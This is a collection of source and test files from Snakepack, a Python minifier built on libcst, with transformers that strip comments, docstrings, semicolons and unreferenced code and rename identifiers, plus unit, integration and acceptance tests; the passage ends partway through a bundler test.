from snakepack.transformers.python._base import PythonModuleTransformer, BatchablePythonModuleTransformer
class RemoveCommentsTransformer(BatchablePythonModuleTransformer):
class _CstTransformer(PythonModuleTransformer._CstTransformer):
def leave_Comment(self, original_node: Comment, updated_node: Comment) -> Union[Comment, RemovalSentinel]:
return RemovalSentinel.REMOVE
__config_name__ = 'remove_comments'
```
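For illustration only (not from the repository): the comment-stripping effect of `RemoveCommentsTransformer` can be reproduced with a bare libcst transformer, which is essentially what its `_CstTransformer` does inside Snakepack's transform pipeline:
```python
from typing import Union

import libcst
from libcst import CSTTransformer, Comment, RemovalSentinel

class _StripComments(CSTTransformer):
    def leave_Comment(self, original_node: Comment, updated_node: Comment) -> Union[Comment, RemovalSentinel]:
        return RemovalSentinel.REMOVE

module = libcst.parse_module("x = 1  # answer\n# a full-line comment\ny = 2\n")
print(module.visit(_StripComments()).code)  # comments are gone, surrounding whitespace/newlines are preserved
```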
#### File: transformers/python/remove_literal_statements.py
```python
from typing import Optional, Union
from libcst import CSTTransformer, Comment, RemovalSentinel, SimpleStatementLine, BaseStatement, FlattenSentinel, \
MaybeSentinel, FunctionDef, SimpleStatementSuite, IndentedBlock, Pass, BaseSmallStatement, Expr, Integer, BaseSuite, \
BaseNumber, BaseString, Tuple, BaseList, BaseSet, BaseDict
from snakepack.analyzers.python.literals import LiteralDuplicationAnalyzer
from snakepack.transformers.python._base import PythonModuleTransformer, BatchablePythonModuleTransformer
class RemoveLiteralStatementsTransformer(BatchablePythonModuleTransformer):
REQUIRED_ANALYZERS = PythonModuleTransformer.REQUIRED_ANALYZERS + [
LiteralDuplicationAnalyzer
]
class _CstTransformer(PythonModuleTransformer._CstTransformer):
def leave_SimpleStatementSuite(
self,
original_node: SimpleStatementSuite,
updated_node: SimpleStatementSuite,
) -> BaseSuite:
if len(updated_node.body) > 1:
return updated_node.with_changes(
body=[
stmt
for stmt in updated_node.body
if (not isinstance(stmt, Expr) or
(stmt.value is not Ellipsis and
not isinstance(stmt.value, (
BaseNumber,
BaseString,
Tuple,
BaseList,
BaseSet,
BaseDict
)
))
)
]
)
return updated_node
def leave_IndentedBlock(self, original_node: IndentedBlock, updated_node: IndentedBlock) -> BaseSuite:
changed_body = []
for line in updated_node.body:
if isinstance(line, SimpleStatementLine):
changed_line = line.with_changes(
body=[
stmt
for stmt in line.body
if not isinstance(stmt, Expr) or
(stmt.value is not Ellipsis and
not isinstance(stmt.value, (
BaseNumber,
BaseString,
Tuple,
BaseList,
BaseSet,
BaseDict
)
)
)
]
)
if len(changed_line.body) > 0:
changed_body.append(changed_line)
else:
changed_body.append(line)
if len(changed_body) == 0:
# statement required - add 0 literal
changed_body.append(
SimpleStatementLine(
body=[
Expr(
value=Integer(
value='0'
)
)
]
)
)
return updated_node.with_changes(body=changed_body)
__config_name__ = 'remove_literal_statements'
```
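For intuition, a hypothetical before/after (not a test from the repository): the transformer drops bare literal expression statements, such as docstrings, from indented blocks and inserts a `0` literal when a block would otherwise end up empty:
```python
# before the transformer runs
def f():
    """docstring"""
    return 1

def g():
    """only a docstring"""

# after the transformer runs
def f():
    return 1

def g():
    0
```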
#### File: transformers/python/remove_semicolons.py
```python
from typing import Optional, Union
from libcst import CSTTransformer, Comment, RemovalSentinel, SimpleStatementLine, BaseStatement, FlattenSentinel, \
MaybeSentinel
from snakepack.transformers.python._base import PythonModuleTransformer, BatchablePythonModuleTransformer
class RemoveSemicolonsTransformer(BatchablePythonModuleTransformer):
class _CstTransformer(PythonModuleTransformer._CstTransformer):
def leave_SimpleStatementLine(
self, original_node: SimpleStatementLine, updated_node: SimpleStatementLine
) -> Union[BaseStatement, FlattenSentinel[BaseStatement], RemovalSentinel]:
updated_statements = []
num_statements = len(original_node.body)
for index, statement in enumerate(original_node.body):
if index == num_statements - 1: # last statement, semicolon not required
updated_statements.append(statement.with_changes(semicolon=MaybeSentinel.DEFAULT))
else:
updated_statements.append(statement)
return updated_node.with_changes(body=updated_statements)
__config_name__ = 'remove_semicolons'
```
#### File: transformers/python/remove_unreferenced_code.py
```python
from typing import Optional, Union
from libcst import CSTTransformer, Comment, RemovalSentinel, SimpleStatementLine, BaseStatement, FlattenSentinel, \
MaybeSentinel, ClassDef, Name, FunctionDef, CSTNode, BaseSmallStatement, Assign, Attribute, AnnAssign, Import, \
Tuple, List, ImportFrom, ImportStar
from libcst.metadata import FunctionScope, ClassScope, ComprehensionScope, GlobalScope
from snakepack.analyzers.python.imports import ImportGraphAnalyzer
from snakepack.analyzers.python.scope import ScopeAnalyzer
from snakepack.transformers.python._base import PythonModuleTransformer
class RemoveUnreferencedCodeTransformer(PythonModuleTransformer):
REQUIRED_ANALYZERS = PythonModuleTransformer.REQUIRED_ANALYZERS + [
ScopeAnalyzer,
ImportGraphAnalyzer
]
class _CstTransformer(PythonModuleTransformer._CstTransformer):
def leave_FunctionDef(
self, original_node: FunctionDef, updated_node: FunctionDef
) -> Union[BaseStatement, FlattenSentinel[BaseStatement], RemovalSentinel]:
if not self._is_referenced(original_node, updated_node.name.value, assignment=False):
return RemovalSentinel.REMOVE
return updated_node
def leave_ClassDef(
self, original_node: ClassDef, updated_node: ClassDef
) -> Union[BaseStatement, FlattenSentinel[BaseStatement], RemovalSentinel]:
if not self._is_referenced(original_node, updated_node.name.value, assignment=False):
return RemovalSentinel.REMOVE
return updated_node
def leave_Assign(
self, original_node: Assign, updated_node: Assign
) -> Union[BaseSmallStatement, FlattenSentinel[BaseSmallStatement], RemovalSentinel]:
if len(updated_node.targets) > 1:
                # don't touch multi-assignments (need type inference to reliably remove them)
return updated_node
scope = self._analyses[ScopeAnalyzer].get_scope_for_node(original_node)
if not isinstance(updated_node.targets[0].target, Name) or isinstance(scope, ClassScope):
# don't touch attributes (references not reliably detected)
return updated_node
if not self._is_referenced(original_node.targets[0].target, updated_node.targets[0].target.value):
return RemovalSentinel.REMOVE
return updated_node
def leave_AnnAssign(
self, original_node: AnnAssign, updated_node: AnnAssign
) -> Union[BaseSmallStatement, FlattenSentinel[BaseSmallStatement], RemovalSentinel]:
scope = self._analyses[ScopeAnalyzer].get_scope_for_node(original_node)
if not isinstance(updated_node.target, Name) or isinstance(scope, ClassScope):
# don't touch attributes (references not reliably detected)
return updated_node
if not self._is_referenced(original_node.target, updated_node.target.value):
return RemovalSentinel.REMOVE
return updated_node
def leave_Import(
self, original_node: Import, updated_node: Import
) -> Union[BaseSmallStatement, FlattenSentinel[BaseSmallStatement], RemovalSentinel]:
updated_imports = []
for import_ in original_node.names:
if import_.asname is None:
imported_name = import_.name.value if isinstance(import_.name, Name) else import_.name.attr.value
else:
assert isinstance(import_.asname.name, Name)
imported_name = import_.asname.name.value
if self._is_referenced(import_.name, imported_name):
updated_imports.append(import_)
if len(updated_imports) > 0:
updated_imports[-1] = updated_imports[-1].with_changes(comma=MaybeSentinel.DEFAULT)
return updated_node.with_changes(names=updated_imports)
return RemovalSentinel.REMOVE
def leave_ImportFrom(
self, original_node: ImportFrom, updated_node: ImportFrom
) -> Union[BaseSmallStatement, FlattenSentinel[BaseSmallStatement], RemovalSentinel]:
if isinstance(updated_node.names, ImportStar):
# don't remove star imports
return updated_node
updated_imports = []
for import_ in original_node.names:
if import_.asname is None:
imported_name = import_.name.value if isinstance(import_.name, Name) else import_.name.attr.value
else:
assert isinstance(import_.asname.name, Name)
imported_name = import_.asname.name.value
if self._is_referenced(import_.name, imported_name):
updated_imports.append(import_)
if len(updated_imports) > 0:
updated_imports[-1] = updated_imports[-1].with_changes(comma=MaybeSentinel.DEFAULT)
return updated_node.with_changes(names=updated_imports)
return RemovalSentinel.REMOVE
def _is_referenced(self, node: CSTNode, identifier: str, assignment=True) -> bool:
if not assignment and self._analyses[ScopeAnalyzer].is_in_local_scope(node):
scope = self._analyses[ScopeAnalyzer].get_scope_for_node(node)
if identifier in scope.accesses:
# only remove unreferenced code in local scope
return True
return False
# fallback to assuming the code is referenced
return True
__config_name__ = 'remove_unreferenced_code'
```
#### File: transformers/python/_renaming.py
```python
import string
from collections import deque
from itertools import chain, cycle, dropwhile, islice, permutations, repeat, count
from keyword import iskeyword
from typing import Mapping, Iterable, Dict, Set, Optional, List, Generator, Deque, Tuple
from libcst.metadata import Scope, Assignment
class NameRegistry:
def __init__(self):
self._scopes: Dict[Scope, Tuple[Generator[str, None, None], Deque]] = {}
self._registered_names: Dict[Scope, Set[str]] = {}
def generate_name_for_scope(self, scope: Scope) -> str:
if scope not in self._scopes:
self._scopes[scope] = self._generate_identifiers()
if scope not in self._registered_names:
self._registered_names[scope] = set()
name = None
while name is None or name in self._registered_names[scope] or iskeyword(name):
name = next(self._scopes[scope])
return name
def register_name_for_scope(self, scope: Scope, name: str):
if scope not in self._registered_names:
self._registered_names[scope] = set()
self._registered_names[scope].add(name)
self._scopes[scope] = self._generate_identifiers()
def reset(self, scope: Scope):
self._scopes[scope] = self._generate_identifiers()
def _generate_identifiers(self):
first_chars = string.ascii_letters
chars = first_chars + string.digits
yield from first_chars
size = 2
while True:
yield from map(lambda x: ''.join(x), permutations(chars, size))
size += 1
```
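A small illustration (not from the repository, assuming `NameRegistry` is importable) of the candidate sequence: single ASCII letters first, then two-character permutations, with keywords and already-registered names skipped per scope:
```python
registry = NameRegistry()
scope = object()  # stands in for a libcst Scope; any hashable object works for this sketch

names = []
for _ in range(4):
    name = registry.generate_name_for_scope(scope)
    registry.register_name_for_scope(scope, name)
    names.append(name)

print(names)  # ['a', 'b', 'c', 'd']; once 'a'..'Z' are taken, two-character names like 'ab' follow
```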
#### File: tests/acceptance/test_snakepack.py
```python
from pathlib import Path
import pytest
from snakepack.app import snakepack
from tests.acceptance._base import BaseAcceptanceTest, per_transformer, ALL_TRANSFORMERS
class SnakepackAcceptanceTest(BaseAcceptanceTest):
_SUBJECT_NAME = 'snakepack'
_SOURCEDIR = Path(__file__).resolve().parent.parent.parent
_APPLICATION_ENTRY_POINT = 'snakepack/__main__.py'
_EXTRA_INCLUDES = ['pkg_resources._vendor.appdirs']
_LIBRARY_PACKAGES = ['snakepack', 'tests']
_TEST_CMD = 'pytest -m "not hypothesis" -k "not AcceptanceTest" {dist_path}/tests'
_EXTRA_TEST_FILES = ['pyproject.toml']
# application tests (import graph loader)
def test_snakepack_as_application_with_no_transformers(self, cli_runner, tmp_path, results_bag):
test_path = self._create_test_path(tmp_path)
config = self._create_application_config(transformers=None, test_path=test_path)
self._test_snakepack(config=config, cli_runner=cli_runner, test_path=test_path, results_bag=results_bag)
self._test_application_compiled_output(test_path=test_path, cli_runner=cli_runner)
def test_snakepack_as_application_with_all_transformers(self, cli_runner, tmp_path, results_bag):
test_path = self._create_test_path(tmp_path)
config = self._create_application_config(transformers=ALL_TRANSFORMERS, test_path=test_path)
self._test_snakepack(config=config, cli_runner=cli_runner, test_path=test_path, results_bag=results_bag)
self._test_application_compiled_output(test_path=test_path, cli_runner=cli_runner)
@per_transformer()
def test_snakepack_as_application_with_each_transformer_individually(self, transformer, cli_runner, tmp_path, results_bag):
test_path = self._create_test_path(tmp_path)
config = self._create_application_config(transformers=[transformer], test_path=test_path)
self._test_snakepack(config=config, cli_runner=cli_runner, test_path=test_path, results_bag=results_bag)
self._test_application_compiled_output(test_path=test_path, cli_runner=cli_runner)
# library tests (package loader)
def test_snakepack_as_library_with_no_transformers(self, cli_runner, tmp_path, results_bag):
test_path = self._create_test_path(tmp_path)
config = self._create_library_config(transformers=None, test_path=test_path)
self._test_snakepack(config=config, cli_runner=cli_runner, test_path=test_path, results_bag=results_bag)
self._test_library_compiled_output(test_path=test_path)
def test_snakepack_as_library_with_all_transformers(self, cli_runner, tmp_path, results_bag):
test_path = self._create_test_path(tmp_path)
config = self._create_library_config(transformers=ALL_TRANSFORMERS, test_path=test_path)
self._test_snakepack(config=config, cli_runner=cli_runner, test_path=test_path, results_bag=results_bag)
self._test_library_compiled_output(test_path=test_path)
@per_transformer()
def test_snakepack_as_library_with_each_transformer_individually(self, transformer, cli_runner, tmp_path, results_bag):
test_path = self._create_test_path(tmp_path)
config = self._create_library_config(transformers=[transformer], test_path=test_path)
self._test_snakepack(config=config, cli_runner=cli_runner, test_path=test_path, results_bag=results_bag)
self._test_library_compiled_output(test_path=test_path)
def _test_application_compiled_output(self, test_path, cli_runner):
config = self._create_application_config(test_path=test_path, roundtrip=True)
self._test_snakepack(config=config, cli_runner=cli_runner, test_path=test_path, roundtrip=True)
```
#### File: analyzers/python/test_scope.py
```python
from textwrap import dedent
from libcst import parse_module
from libcst.metadata import FunctionScope, ScopeProvider
from snakepack.analyzers.python.scope import ScopeAnalyzer
from snakepack.assets.python import PythonModuleCst, PythonModule
class ScopeAnalyzerIntegrationTest:
def test_analyze(self):
content = PythonModuleCst(
cst=parse_module(
dedent(
"""
a = True
def b(c):
return c
class D:
e = True
def f(g):
return g
"""
)
)
)
module = PythonModule(
name='a',
content=content,
source=None
)
analyzer = ScopeAnalyzer()
analysis = analyzer.analyse_subject(module)
g_var = content.cst.body[2].body.body[1].body.body[0].body[0].value
assert isinstance(analysis[ScopeProvider][g_var], FunctionScope)
assert analysis[ScopeProvider][g_var]
```
#### File: integration/config/test_formats.py
```python
from pathlib import Path
from textwrap import dedent
import pytest
from snakepack.bundlers.generic import FileBundler
from snakepack.config import ConfigException
from snakepack.config.options import ComponentConfig
from snakepack.config.model import SnakepackConfig, PackageConfig, BundleConfig
from snakepack.config.formats import parse_yaml_config
from snakepack.loaders.python import ImportGraphLoader
from snakepack.packagers.generic import DirectoryPackager
from snakepack.transformers.python.remove_comments import RemoveCommentsTransformer
class ParseYamlConfigIntegrationTest:
def test_full(self):
yaml = dedent(
"""
source_base_path: 'src/'
target_base_path: 'dist/'
packages:
snakepack:
packager:
name: directory
options:
output_path: 'snakepack_pkg/'
bundles:
snakepack:
bundler:
name: file
options:
loader:
name: import_graph
options:
entry_point: 'snakepack.py'
transformers:
- name: remove_comments
options:
"""
)
parsed_config = parse_yaml_config(yaml)
assert parsed_config == SnakepackConfig(
source_base_path=Path('src/'),
target_base_path=Path('dist/'),
packages={
'snakepack': PackageConfig(
packager=ComponentConfig(
name='directory',
options=DirectoryPackager.Options(
output_path='snakepack_pkg/'
)
),
bundles={
'snakepack': BundleConfig(
bundler=ComponentConfig(
name='file',
options=FileBundler.Options()
),
loader=ComponentConfig(
name='import_graph',
options=ImportGraphLoader.Options(
entry_point=Path('snakepack.py')
)
),
transformers=[
ComponentConfig(
name='remove_comments',
options=RemoveCommentsTransformer.Options()
)
]
)
}
)
}
)
def test_invalid_yaml(self):
yaml = dedent(
"""
packages:
:
"""
)
with pytest.raises(ConfigException):
parse_yaml_config(yaml)
```
#### File: transformers/python/test_remove_semicolons.py
```python
from textwrap import dedent
from libcst import parse_module
from snakepack.analyzers.python.scope import ScopeAnalyzer
from snakepack.assets.python import PythonModuleCst
from snakepack.config.model import GlobalOptions
from snakepack.transformers.python.remove_semicolons import RemoveSemicolonsTransformer
from tests.integration.transformers.python._base import PythonModuleCstTransformerIntegrationTestBase
class RemoveSemicolonsTransformerIntegrationTest(PythonModuleCstTransformerIntegrationTestBase):
_TRANSFORMER_CLASS = RemoveSemicolonsTransformer
def test_transform(self):
input_content = dedent(
"""
x = 5;
foo();
x=4;x=3;
a:int=3;
assert True;
"""
)
expected_output_content = dedent(
"""
x = 5
foo()
x=4;x=3
a:int=3
assert True
"""
)
self._test_transformation(input=input_content, expected_output=expected_output_content)
```
#### File: transformers/python/test_rename_identifiers.py
```python
from textwrap import dedent
from typing import Iterable
from unittest.mock import MagicMock
from libcst import parse_module
from snakepack.analyzers import Analyzer
from snakepack.analyzers.python.imports import ImportGraphAnalyzer
from snakepack.analyzers.python.scope import ScopeAnalyzer
from snakepack.assets.python import PythonModuleCst
from snakepack.config.model import GlobalOptions
from snakepack.transformers.python.rename_identifiers import RenameIdentifiersTransformer
from tests.integration.transformers.python._base import PythonModuleCstTransformerIntegrationTestBase
class RenameIdentifiersTransformerIntegrationTest(PythonModuleCstTransformerIntegrationTestBase):
_TRANSFORMER_CLASS = RenameIdentifiersTransformer
def test_transform(self):
input_content = dedent(
"""
xo = 5;
def foo(attr, anattr):
pass
def bar(attr, anattr):
return b(attr, anattr)
class Class(object):
attr = 'foo'
foo(x);
yo = 6
a = xo + yo
Class.attr = 'bar'
def imported(a, b, c):
ooops = True
def inner():
nonlocal ooops
print(ooops)
zigzag = 5
zigzag = 6
def function():
zigzag = 0
zigzag += 1
"""
)
expected_output_content = dedent(
"""
b = 5;
def c(d, e):
pass
def d(e, f):
return b(e, f)
class e(object):
attr = 'foo'
c(x);
f = 6
a = b + f
e.attr = 'bar'
def imported(a, b, c):
j = True
def g():
nonlocal j
print(j)
h = 5
h = 6
def g():
h = 0
h += 1
"""
)
self._test_transformation(
input=input_content,
expected_output=expected_output_content,
options=RenameIdentifiersTransformer.Options(only_rename_locals=False)
)
def test_transform_only_rename_in_local_scope(self):
input_content = dedent(
"""
xo = 5;
def foo(attr: int, anattr):
pass
def bar(attr, anattr: str):
return b(attr, anattr)
class Class(object):
attr = 'foo'
foo(x);
yo = 6
a = xo + yo
Class.attr = 'bar'
def imported(a, b, c):
ooops = True
def inner():
nonlocal ooops
nonlocal c
print(ooops)
zigzag = 5
zigzag = 6
def function():
zigzag = 0
zigzag += 1
def nonlocal_1():
foobar = True
def nonlocal_2():
nonlocal foobar
foobar = False
def func1():
var1 = 1
def func2(some_var: SomeClazz):
var2 = 2
print(some_var)
some_var = 'reassigned'
def func3(other_var):
print(var2=some_var)
print(other_var)
print(var1 + var2)
def importtest():
imported_var: SomeType
from some_module import imported_var
"""
)
expected_output_content = dedent(
"""
xo = 5;
def foo(attr: int, anattr):
pass
def bar(attr, anattr: str):
return b(attr, anattr)
class Class(object):
attr = 'foo'
foo(x);
yo = 6
a = xo + yo
Class.attr = 'bar'
def imported(a, b, c):
d = True
def e():
nonlocal d
nonlocal c
print(d)
zigzag = 5
zigzag = 6
def function():
b = 0
zigzag += 1
def nonlocal_1():
b = True
def c():
nonlocal b
b = False
def func1():
b = 1
def c(some_var: SomeClazz):
d = 2
print(some_var)
some_var = 'reassigned'
def e(other_var):
print(var2=some_var)
print(other_var)
print(b + d)
def importtest():
imported_var: SomeType
from some_module import imported_var
"""
)
self._test_transformation(input=input_content, expected_output=expected_output_content)
def _create_analyzers(self) -> Iterable[Analyzer]:
def _get_importing_modules(module, identifier):
if identifier == 'imported':
return [
MagicMock()
]
return []
def _identifier_imported_in_module(identifier, module):
if identifier == 'imported_var':
return True
return False
import_graph_analysis = MagicMock(spec=ImportGraphAnalyzer.Analysis)
import_graph_analysis.get_importing_modules.side_effect = _get_importing_modules
import_graph_analysis.identifier_imported_in_module.side_effect = _identifier_imported_in_module
import_graph_analyzer = MagicMock(spec=ImportGraphAnalyzer)
import_graph_analyzer.analyse_assets.return_value = import_graph_analysis
return [
ScopeAnalyzer(),
import_graph_analyzer
]
```
#### File: analyzers/python/test_imports.py
```python
from unittest.mock import MagicMock
import pytest
from libcst import Import, ImportAlias, Name, Attribute, Module
from modulegraph.modulegraph import ModuleGraph, Node
from snakepack.assets import AssetContent
from snakepack.analyzers.python.imports import ImportGraphAnalyzer
from snakepack.assets.python import PythonApplication, PythonModule
class ImportGraphAnalyzerAnalysisTest:
def test_modulegraph_returns_no_referers(self):
module_graph = MagicMock(spec=ModuleGraph)
module_graph.getReferers.return_value = []
node_map = MagicMock()
import_metadata = MagicMock()
test_imported_module = MagicMock(spec=PythonModule)
analysis = ImportGraphAnalyzer.Analysis(
module_graph=module_graph,
node_map=node_map,
import_metadata=import_metadata
)
imported_modules = analysis.get_importing_modules(test_imported_module)
assert imported_modules == []
def test_without_identifier(self):
module_graph = MagicMock(spec=ModuleGraph)
node1 = MagicMock(spec=Node)
node2 = MagicMock(spec=Node)
node3 = MagicMock(spec=Node)
module_graph.getReferers.return_value = [
node1,
node2
]
module1 = MagicMock(spec=PythonModule)
module2 = MagicMock(spec=PythonModule)
test_imported_module = MagicMock(spec=PythonModule)
node_map = {
module1: node1,
module2: node2,
test_imported_module: node3
}
module1_imports = MagicMock()
module2_imports = MagicMock()
testmodule_imports = MagicMock()
import_metadata = {
module1: module1_imports,
module2: module2_imports,
test_imported_module: testmodule_imports
}
analysis = ImportGraphAnalyzer.Analysis(
module_graph=module_graph,
node_map=node_map,
import_metadata=import_metadata
)
imported_modules = analysis.get_importing_modules(test_imported_module)
assert len(imported_modules) == 2
assert module1 in imported_modules
assert module2 in imported_modules
@pytest.mark.skip
def test_import_stmts(self):
module_graph = MagicMock(spec=ModuleGraph)
node1 = MagicMock(spec=Node)
node2 = MagicMock(spec=Node)
node3 = MagicMock(spec=Node)
module_graph.getReferers.return_value = [
node1,
node2
]
module1 = MagicMock(spec=PythonModule)
module1_content = MagicMock(spec=AssetContent)
module1_cst = MagicMock(spec=Module)
module1_content.cst = module1_cst
module1.content = module1_content
module2 = MagicMock(spec=PythonModule)
module2_content = MagicMock(spec=AssetContent)
module2_cst = MagicMock(spec=Module)
module2_content.cst = module2_cst
module2.content = module2_content
test_imported_module = MagicMock(spec=PythonModule)
test_imported_module.name = 'testmodule'
test_identifier = 'test'
node_map = {
module1: node1,
module2: node2,
test_imported_module: node3
}
module1_importstmt = MagicMock(spec=Import)
module1_importalias1 = MagicMock(spec=ImportAlias)
module1_importalias1_name = MagicMock(spec=Name)
module1_importalias1_name.value = 'not_test'
module1_importalias1.name = module1_importalias1_name
module1_importalias2 = MagicMock(spec=ImportAlias)
module1_importalias2_attr = MagicMock(spec=Attribute)
module1_importalias2_attr_name = MagicMock(spec=Name)
module1_importalias2_attr_name.value = 'testmodule'
module1_importalias2_attr.attr = module1_importalias2_attr_name
module1_importalias2.name = module1_importalias2_attr
module1_importstmt.names = [
module1_importalias1,
module1_importalias2
]
module1_imports = [
module1_importstmt
]
module2_importstmt = MagicMock(spec=Import)
module2_importalias1 = MagicMock(spec=ImportAlias)
module2_importalias1_name = MagicMock(spec=Name)
module2_importalias1_name.value = 'foo'
module2_importalias1.name = module2_importalias1_name
module2_importalias2 = MagicMock(spec=ImportAlias)
module2_importalias2_attr = MagicMock(spec=Attribute)
module2_importalias2_attr_name = MagicMock(spec=Name)
module2_importalias2_attr_name.value = 'bar'
module2_importalias2_attr.attr = module2_importalias2_attr_name
module2_importalias2.name = module2_importalias2_attr
module2_importstmt.names = [
module2_importalias1,
module2_importalias2
]
module2_imports = [
module2_importstmt
]
testmodule_imports = MagicMock()
import_metadata = {
module1: {
ImportGraphAnalyzer.ImportProvider: {
module1_cst: module1_imports
}
},
module2: {
ImportGraphAnalyzer.ImportProvider: {
module2_cst: module2_imports
}
},
test_imported_module: testmodule_imports
}
analysis = ImportGraphAnalyzer.Analysis(
module_graph=module_graph,
node_map=node_map,
import_metadata=import_metadata
)
imported_modules = analysis.get_importing_modules(test_imported_module, test_identifier)
assert len(imported_modules) == 1
assert module1 in imported_modules
assert module2 not in imported_modules
def test_importfrom_stmts(self):
pass
```
#### File: unit/assets/test_generic.py
```python
from pathlib import Path
from snakepack.assets import AssetType, AssetContent
from snakepack.assets.generic import GenericAsset, StaticFile
class GenericAssetTest:
def test_generic_asset_type(self):
assert issubclass(GenericAsset, AssetType)
class StaticFileTest:
def test_init(self, mocker):
content = mocker.MagicMock(spec=AssetContent)
module = StaticFile(name='some_file', target_path=Path('some_file.txt'), content=content, source=None)
assert module.content is content
```
#### File: unit/assets/test_python.py
```python
import pytest
from libcst import Module
from snakepack.assets import AssetType, AssetContent
from snakepack.assets.python import Python, PythonModule, PythonModuleCst, PythonPackage, PythonApplication
from snakepack.config.types import FullyQualifiedPythonName
class PythonTest:
def test_python_asset_type(self):
assert issubclass(Python, AssetType)
class PythonModuleTest:
def test_init(self, mocker):
content = mocker.MagicMock(spec=AssetContent)
module = PythonModule(name='some.test.module', content=content, source=None)
assert module.name == 'some.test.module'
assert module.content is content
def test_matches_returns_true_when_selector_is_full_module_name(self, mocker):
content = mocker.MagicMock(spec=AssetContent)
module = PythonModule(name='some.test.module', content=content, source=None)
selector = mocker.MagicMock(spec=FullyQualifiedPythonName)
selector.has_module_path = True
selector.module_path = ['some', 'test', 'module']
assert module.matches(selector)
def test_matches_returns_true_when_selector_is_identifier(self, mocker):
content = mocker.MagicMock(spec=AssetContent)
module = PythonModule(name='some.test.module', content=content, source=None)
selector = mocker.MagicMock(spec=FullyQualifiedPythonName)
selector.has_module_path = False
selector.has_ident_path = False
assert module.matches(selector)
def test_matches_returns_true_when_selector_is_package_of_module(self, mocker):
content = mocker.MagicMock(spec=AssetContent)
module = PythonModule(name='some.test.module', content=content, source=None)
selector = mocker.MagicMock(spec=FullyQualifiedPythonName)
selector.has_module_path = True
selector.has_ident_path = False
selector.module_path = ['some', 'test']
assert module.matches(selector)
def test_matches_returns_false_when_selector_is_other_module(self, mocker):
content = mocker.MagicMock(spec=AssetContent)
module = PythonModule(name='some.test.module', content=content, source=None)
selector = mocker.MagicMock(spec=FullyQualifiedPythonName)
selector.has_module_path = True
selector.has_ident_path = False
selector.module_path = ['some', 'test', 'othermodule']
assert not module.matches(selector)
def test_matches_returns_false_when_selector_is_identifier(self, mocker):
content = mocker.MagicMock(spec=AssetContent)
module = PythonModule(name='some.test.module:some_ident', content=content, source=None)
selector = mocker.MagicMock(spec=FullyQualifiedPythonName)
selector.has_module_path = True
selector.has_ident_path = False
selector.module_path = ['some', 'test', 'othermodule']
assert not module.matches(selector)
class PythonModuleCstTest:
@pytest.mark.skip
def test_init(self, mocker):
cst = mocker.MagicMock(spec=Module)
cst.code = 'x=5'
content = PythonModuleCst(cst=cst)
assert content.cst is cst
assert str(content) == 'x=5'
@pytest.mark.skip
def test_from_string(self, mocker):
parse_module_mock = mocker.patch('libcst.parse_module')
cst = parse_module_mock.return_value
content = PythonModuleCst.from_string('x=5')
assert content.cst is cst
class PythonPackageTest:
def test_init(self, mocker):
subpackages = []
init_module = mocker.MagicMock(spec=PythonModule)
init_module.name = 'mypackage.__init__'
module1 = mocker.MagicMock(spec=PythonModule)
module2 = mocker.MagicMock(spec=PythonModule)
modules = [init_module, module1, module2]
package = PythonPackage(full_name='mypackage', modules=modules, subpackages=subpackages, data_files=[])
assert package.full_name == 'mypackage'
assert package.name == 'mypackage'
assert package.subgroups == subpackages
assert package.assets == modules
assert package.init_module is init_module
assert package.deep_assets == modules
def test_init_with_subpackages(self, mocker):
sub_init_module = mocker.MagicMock(spec=PythonModule)
sub_init_module.name = 'mypackage.subpackage.__init__'
sub_module1 = mocker.MagicMock(spec=PythonModule)
sub_module2 = mocker.MagicMock(spec=PythonModule)
sub_modules = [sub_init_module, sub_module1, sub_module2]
subpackages = [
PythonPackage(full_name='mypackage.subpackage', modules=sub_modules, subpackages=[], data_files=[])
]
init_module = mocker.MagicMock(spec=PythonModule)
init_module.name = 'mypackage.__init__'
module1 = mocker.MagicMock(spec=PythonModule)
module2 = mocker.MagicMock(spec=PythonModule)
modules = [init_module, module1, module2]
package = PythonPackage(full_name='mypackage', modules=modules, subpackages=subpackages, data_files=[])
assert package.full_name == 'mypackage'
assert package.name == 'mypackage'
assert package.subgroups == subpackages
assert package.assets == modules
assert package.init_module is init_module
assert package.deep_assets == [
*modules,
*sub_modules
]
class PythonApplicationTest:
def test_init(self, mocker):
entry_module = mocker.MagicMock(spec=PythonModule)
module1 = mocker.MagicMock(spec=PythonModule)
module2 = mocker.MagicMock(spec=PythonModule)
modules = [entry_module, module1, module2]
application = PythonApplication(entry_point=entry_module, modules=modules, packages={})
assert application.entry_point is entry_module
assert application.assets == modules
assert application.deep_assets == modules
assert application.subgroups == {}
```
#### File: unit/bundlers/test_base.py
```python
from snakepack.assets import Asset
from snakepack.bundlers import Bundle
from snakepack.bundlers._base import Bundler
from snakepack.config.model import GlobalOptions
from snakepack.loaders import Loader
from snakepack.transformers import Transformer
class BundleTest:
def test_init(self, mocker):
bundler = mocker.MagicMock(spec=Bundler)
loader = mocker.MagicMock(spec=Loader)
transformers = [
mocker.MagicMock(spec=Transformer),
mocker.MagicMock(spec=Transformer)
]
bundle = Bundle(name='bundle1', bundler=bundler, loader=loader, transformers=transformers)
assert bundle.name == 'bundle1'
assert bundle.bundler is bundler
assert bundle.loader == loader
assert bundle.transformers == transformers
def test_bundle(self, mocker):
bundler = mocker.MagicMock(spec=Bundler)
loader = mocker.MagicMock(spec=Bundler)
assets = []
transformers = []
bundle = Bundle(name='bundle1', bundler=bundler, loader=loader, transformers=transformers)
bundle.bundle()
bundler.bundle.assert_called_once_with(bundle)
class BundlerTest:
class TestBundler(Bundler):
def bundle(self, bundle: Bundle):
pass
def test_init(self, mocker):
global_options = mocker.MagicMock(spec=GlobalOptions)
bundle = mocker.MagicMock(spec=Bundle)
bundler = self.TestBundler(global_options=global_options)
bundler.bundle(bundle)
```
#### File: unit/bundlers/test_generic.py
```python
import os
from pathlib import Path
from snakepack.assets import Asset, AssetContent, AssetGroup
from snakepack.bundlers import Bundle
from snakepack.bundlers.generic import FileBundler
from snakepack.config.model import GlobalOptions
from snakepack.packagers import Package
class FileBundlerTest:
def test_config_name(self):
assert FileBundler.__config_name__ == 'file'
def test_init(self, mocker):
global_options = mocker.MagicMock(spec=GlobalOptions)
options = FileBundler.Options(output_path='test')
bundler = FileBundler(global_options=global_options, options=options)
def test_init_default_options(self, mocker):
global_options = mocker.MagicMock(spec=GlobalOptions)
bundler = FileBundler(global_options=global_options)
assert bundler.options.output_path == '{asset_target_path}'
def test_bundle(self, mocker, fs):
fs.create_dir('dist/')
package = mocker.MagicMock(spec=Package)
package.target_path = Path('dist/package1')
global_options = mocker.MagicMock(spec=GlobalOptions)
options = FileBundler.Options(output_path='{asset_target_path}')
bundler = FileBundler(global_options=global_options, options=options)
